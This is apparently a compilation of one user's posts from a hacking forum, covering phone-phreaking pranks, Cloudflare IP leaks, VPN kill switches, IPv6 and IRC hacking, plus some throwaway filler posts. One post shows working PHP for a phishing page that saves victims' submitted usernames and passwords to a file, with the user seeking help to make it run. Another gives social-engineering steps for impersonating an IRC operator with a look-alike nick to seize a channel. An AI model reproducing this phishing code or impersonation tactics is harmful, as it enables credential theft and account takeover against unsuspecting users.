[Phone Phreaking - Expert Advice Needed!]

This has all been great stuff, thank you guys. Please let me know if you think of anything else. I liked the YouTube video; thanks DigiP. I will be watching to see if Pwnd2Pwnr finds anything in the books he mentioned.

I've got my research cut out for me. I will look up all the topics you guys mentioned that I was not familiar with (pretty much everything except the red and blue boxes). For my own education if not for immediate use.

[Phone Phreaking - Expert Advice Needed!]

I know this is a long shot (since it's 2012), but we don't have any Phone Phreaks in the house, do we?

There's an older guy I have known for a couple of years from a Commodore club -- a real old school phone phreak. I respect the heck out of him and we normally get along really well, but we're having a little friendly disagreement right now, which has given way to him phone phreaking me a bit. He somehow made my calls forward to an adult bookstore and their calls forward to me.

It's in good fun, but obviously I want to hit him back. I have read old proto-hacker stories about phone phreaking, but I don't know any decent tricks that I can pull off on the modern phone system, other than Caller ID spoofing. I suppose a lot of it is social engineering; though I'm not really good at that at all.

Any suggestions, thoughts, tips, tricks, useful stories, or related download links?

[Cloudflare Ip Leak]

Thanks DigiP. I went ahead and contacted the host right after you said that. I just heard back. My host is totally cool and he said he's happy to help in any way, but basically has no clue what to do : /

I can try contacting CloudFlare, but as a free member I doubt if that will pan out. I'm kind of wondering if the trick is simply to disable Mail and FTP. I use those 2 things and those are the 2 that are leaking the IP, but I don't use the other 6-7 things that could have (but did not) leak my server's IP.

I just don't want that to be answer, becuse I pretty much have to keep using mail, if not mail + ftp.

[Cloudflare Ip Leak]

Over the past few months I've noticed every 14 year old on the Internet has a booter with a CloudFlare resolver. I would like to keep my domain safe from DDOS.

When I type in my domain name at www.cloudflareresolver.com however, it does show my real IP on the mail and FTP lines. I've noticed many other CloudFlare sites do not leak their IP in this way though.

How do I configure it such that my IP will not be leaked? I do use the server for mail, I hope I won't have to lose that functionality.

[Vpn Failsafe And Layering]

Wow! This looks extremely interesting; I'm going to have to go over it and try out the commands soon.

You're right of course, there's always a significant tradeoff of speed for security. I really just want to figure out how to properly anonymize like this, just for some unknown/unlikely possible future need, not for regular usage. Like if I go overseas and need to send some politically sensitive data home some day. Or if they leak a new "Tron" movie, I might not be able to resist downloading it :)

For the record I did find a bit of a second-rate solution to my other problem, which was that if the VPN disconnects you might not want your real IP to be exposed to the torrent or whatever servers you're connected to, etc. It's a rudimentary script: http://vpnetmon.webs.com/

[Vpn Failsafe And Layering]

I've been really frustrated over the past couple of years by VPN's disconnecting and leaking real IP's. It's never been a life or death issue for me, but it's plenty annoying and when I introduce people to the concept of a VPN or proxy and set them up with it I really want it to work without betraying them.

I know that disconnects happen, especially when you've been connected for long periods of time. Can't change that. But is there some way to tell Windows, OS X, and/or Linux that "when this VPN [or proxy] gets disconnected I want you to disconnect from the Internet/Access Point and do not send any traffic unless I've reconnected?".

Also, I'm wondering if it's possible to get some additional layers, like with a simple proxy chain. I've never heard of anyone getting a chain of VPN's to work, although I used to do VPS + VPN pretty easily. How about proxies + VPN? If I tell application X, like a torrent client or email program or whatever, to use this HTTP or SOCKS5 proxy while my OpenVPN is running then will the traffic going to application X pass through both the OpenVPN and proxy or will the proxy essentially operate independently of the VPN?

What I mean is, normally the VPN knows your "real" IP as well as the server IP is assigns to you. The same is true of a SOCKS 5 or HTTP proxy. But can we make it where traffic goes from you to the VPN then from the VPN to the proxy, such that the proxy never sees your real IP and the external Internet never sees the IP of the VPN?

[Building Your Own Secure Website/vds]

Good point! Thank you

[Building Your Own Secure Website/vds]

But I mean I was going to host the webpage on my computer anyway, which is what a darkweb host would do for you, right? I just wanna know like what's the best server (Apache, etc), what Operating System (NetSecL), etc

[Building Your Own Secure Website/vds]

Thanks, you're right. That's a good answer, but I should have mentioned that I'm scared of the darknet and don't want to mess around with it, because I think it would put me in a small group filled with a lot of really really bad people, blah, blah, blah

[Building Your Own Secure Website/vds]

I have an extra desktop computer with no OS installed, that I use for playing with live boot linux disks.

I would like to host my own server/website, with the maximum possible security and anonymity then offer it up as a hacking target like www.hackthissite.org so that I can learn by trial and error how to secure/run a server, and maybe make a few friends in the process (visitors).

What choices would you make to get started?

Do you think that the choice of server matters, or are they all basically equal except for whichever one is easiest to configure properly? Should I just go with Apache despite all the vulnerabilities?

What would be the role of a service like www.noip.com or dyn.com? Would those DNS services actually keep website visitors from seeing my home internet connection IP? If I register a domain, sign up an account at www.noip.com, is that no IP host my nameserver for the DNS name?

If I have the website/webapp running on the old desktop I'm making my server, then can I still use VPNs on my other home computers/laptops/devices without knocking my website offline?

Does it matter which distro/OS I pick, and what do you recommend if so? Most of the sec distros at www.distrowatch.com are blackhat focused, so I don't know if it would really help me as the webmaster / sys admin?

Should I use something like NetSecL or LPS that is configured to be isolated and more locked down?

Thanks in advance

[Ipv6]

Thanks very much for the help!

Hurricane Electric, thanks so much you're a lifesaver. Someone from the Cesidian root showed it to me ages ago but I didn't quite get it and I've been trying to recall what that thing was.

It's going to be stretching my limits but I will read all up on it and try to do as you described. I will only need to run this app on one computer so hopefully it will be a managable task. It's propriatary but it's performing a certain type of statistical/economic analysis on data in their database.

[Cain And Abel With Windows Ics]

Did you use C&A bc you like it for other reasons, or was this the reason? I see you have BT5 open there too. You could do everything from within there, no?

[Ipv6]

For this question I'm going to get down on my knees and beg for a helping hand, spoon feeding, or anything except RTFM / Google it / get a degree in IT/CS...

Please, please help me become IPv6 compatible. I tried to understand and read stuff about this a few months ago, but it's confusing to a layman and I was told by my ISP in March that at the universal IPv6 date everything would be automatically compatible/upgraded/enabled so I can quit worrying about it.

Well now it is not only past IPv6 day, but I've got an urgent task for a client that requires my software to be IPv6 compatible apparently, and I am not compatible.

If you could give me the simplest, straight-line path to resolving this I would be very grateful. I use all three major OS families, so I will take support for any/all. I have all browsers, but prefer Aurora (FF 16) and the program is a propriatary web app.

[Question About Truecrypt]

You see, Mr. P? Look at you being all helpful! As almost always!!

You can't help it! You love it! You didn't tell him to Google it or that you don't spoon-feed or anything. He asked a question and you knew the answer so you answered it. Then he asked ANOTHER question even though he has a perfectly good Google-capable browser and you answered it AGAIN.

It's not just bc of the sub-forum either. I can point out you being all helpful in Jasager and probably every area of the forum. You can't help yourself. You're NICE and HELPFUL and you love questions! You even ask them!

;) lolololol <3 <3 <3 Now go tell "science" you're sorry ;) jk! you da man

[Irc Hacking In 2012]

I don't think I have enough of a history on this forum (or any forum, for security reasons) to dig into the "is it okay to ask questions or should the forum be replaced with a link to google" debate*. It's fine by me if people want to ask and answer questions here though, getting much more quality and reputable answers in a more reliable and custom form than what you'd get with only your own research.

I just want to say OVER 9,000 INTERNETS to DigiP.

I don't know how hackers could possibly think things are secure. I live in digip's world. There are vulnerabilities EVERYWHERE. If you're OP and you've been inexplicitly out of the loop since 1999 you're probably overwhelmed with all the many new holes in security to catch up with as a pen tester or, in his case, an IRC Op I guess.

As it happens, IRC is actually one of my least favorite parts of the Internet (logs+pointless chatter, IMHO) so I don't know much about it and I've never even had voice let alone been an Op or admin or whatever. But even I knew about wIRC and there are toooons of vulnerabilities that affect big fat networks like DalNET, EFnet, Freenode,etc. Why? Because the IRC clients can be determined on all those nets -- and those clients have exploits, hacks, bugs, you name it. Maybe not every client at every given moment but in wIRC they have about 200 different kills built in that worked at the time and about 25% of them still work years later.

Especially for mIRC which may as well be called insecureIRC. I see all this without being 10% of the hacker that Mr. P is and with spending an average of 10 minutes on IRC per year.

Oh yea, one more thing -- there are billions of bots in IRC right? Good and evil. Well, many of those bots can be pwned. Not to mention, there's plenty of room for the strongest tool in the traditional hacker's toolbox... the same tool that just got like 50,000 linux users' credit cards stolen from WH-whatever the server billing company... social engineering!

This is basic, but you can go on there and watch quietly, see when people come and go. See the Op/voice handoffs or whatever. Wait, patiently for some key dude to leave, get his nick or one that's similar (like if his is "pos1tronics" yours is "pos1tron1cs" with the same other info in your profile) and when the current Op is going offline or something you say "Hey buddy, I'll take over". I know that's a rough example, but I hope the general point is conveyed.

* Love you, Mr.P <3! You da man and you help people all the time despite what you say! You love it and we love you ;)

[Irc Hacking In 2012]

I was mainly just teasing, Mr. P. Although it does seem like 95% of hak5 revolves around WiFi, but you're right that there's a richer set of knowledge, such as with the plug experts.

Still, you do realize you just told him that either exploits don't exist or they do and the information is out there on the Internet unless it's not... so in other words we have no clue ;) Just for the record Mr. P is actually extremely smart and knows a ton about computing/hacking. So I should probably phrase that observation that we have no clue with "with all due respect"...I just think the OP may have randomly touched upon a chink in the hak5 armor or something, though.

I believe there was a good script called wIRC, but it's about 5 years old and was mainly just anti-mIRC kills and scripted insults. I will admit that I have no clue for the linux clients like WeeChat or Freenode/Dalnet. WeeChat did have some exploits but they're patched and like you said I use exploit-db to look for them since it comes as a default link in BT5...

[Irc Hacking In 2012]

They just mostly know about WiFi here :/

[Imac > Hardware Keylogger?]

I <3 college booties

[Hidden Iphone Controller]

butt cracks > crack

[Minipwner (tp-link)]

is karma working on this?

i'm building one now

[Glasses That See Invisible Ink]

rfwef

[Karma = No Internet]

From command line run

echo 1 > /proc/sys/net/ipv4/ip_forward

That should correct your Internet sharing issue.

For real? Sweet! I wish I had it on me to give it a try, but I'll be back to it in 8 - 12 hours. What's going on there? I thought echo just printed (showed) anything you type after it?

[Karma = No Internet]

rferferfe

[Dns Spoof / Php]

My HTML webpage seems to work fine -- it looks like the real page that I'm emulating and the forms work -- but when the submit button is clicked instead of sending the data to PHP that saves it as a file and redirects the client (or, ideally, closes the window) my PHP just displays all the code in the browser. Can you help me figure out why? Here's the general format that I'm using:

<?php
if ($_POST['submit']){

$myFile = "donatedpw.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = "username: " . $_POST['username'] . "\n";
fwrite($fh, $stringData);
$stringData = "password: " . $_POST['password'] . "\n";
fwrite($fh, $stringData);
fclose($fh);

} ?>

<script>location.href='http://google.com';</script>

source: http://thisislegal.com/wiki/Create_a_phishing_page

[Hacking Or Tech Movies/documentaries?]

I am huge itno movies so I'm up for watching any movie that is good but I'm hoping to find more documentaries than hollywood entertainment. I can't find Hackers Wanted, Hackers Freedom Downtime, BBS The Documentary, or Hackers Are People Too on Netflix, which really sucks! I've seen all of the Hollywood ones except for Sneakers and Track Down, though the Steig Larsson ones aren't really products of hollywood I guess. I have Trackdown at the top of my Netflix DVD Q, but Snekares doesn't look that interesting, even though it does have Robert redford, so it's closer to the "someday" end of my Q.

I guess I will have to just search the internet to find a place to watch the documentaries I haven't seen yet. If that doesn't work I'll have to buy them on DVD/BluRay.

That hackvids site will help a lot. Hopefully most or all of the links are still working.

It's not called Hackers Freedom Downtime (I tried to correct the OP on that, hehe), it's called Freedom Downtime and you can get it from the producer, Eric (Emmanuel Goldstein) who is also the editor of 2600 and a talk show host. But the sad truth is you really need to see Take Down before you see Freedom Downtime to understand the context.

http://www.freedomdowntime.com

It can also be found to download for free of course, but if you do that get the 2004 not the 2003 version. The 2003 was a leak and the movie changed a lot, including adding a seminal Mitnick interview.